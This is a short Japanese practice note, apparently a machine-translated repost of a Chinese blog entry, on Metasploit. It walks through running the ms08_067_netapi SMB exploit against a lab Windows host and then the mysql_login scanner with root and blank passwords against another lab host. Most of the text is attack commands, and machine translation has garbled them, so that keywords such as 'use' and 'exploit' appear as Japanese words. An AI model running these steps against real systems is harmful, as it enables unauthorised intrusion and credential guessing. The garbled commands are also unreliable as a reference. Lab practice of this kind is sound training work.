Metasploitの練習

再現ms08_067_netapi

 

モジュールの使用

msf5>の使用は、Windows / SMB / ms08_067_netapi /活用します

ビューの設定

msf5は(ウィンドウ/ SMB / ms08_067_netapi)>ショーのオプションを利用します

 

送信先アドレスを設定します

msf5は(ウィンドウ/ SMB / ms08_067_netapi)>セットのrhosts 192.168.19.132活用します

  

ビューターゲット

 

設定対象

msf5エクスプロイト(ウィンドウ/ SMB / ms08_067_netapi)>セットターゲット34

 

設定を確認してください

msf5は(ウィンドウ/ SMB / ms08_067_netapi)>ショーのオプションを利用します

 

彼は攻撃し始めました

msf5は、エクスプロイト>(ウィンドウ/ SMB / ms08_067_netapi)を利用します

 

攻撃が成功

 

 

 -------------------------------分割ライン----------------- --------------------

補助/スキャナ/ mysqlの/ mysql_login

msf5補助(スキャナ/ mysqlの/ mysql_login)>ショーのオプション

msf5補助(スキャナ/ MySQLの/ mysql_login)>セットのrhosts 192.168.19.180

msf5補助(スキャナ/ MySQLの/ mysql_login)>セット名ルート

msf5補助(スキャナ/ MySQLの/ mysql_login)>セットBLANK_PASSWORDS真

msf5補助(スキャナ/ mysqlの/ mysql_login)>ショーのオプション

msf5補助(スキャナ/ mysqlの/ mysql_login)>実行

 

おすすめ

転載: www.cnblogs.com/zi-Chuan/p/12324449.html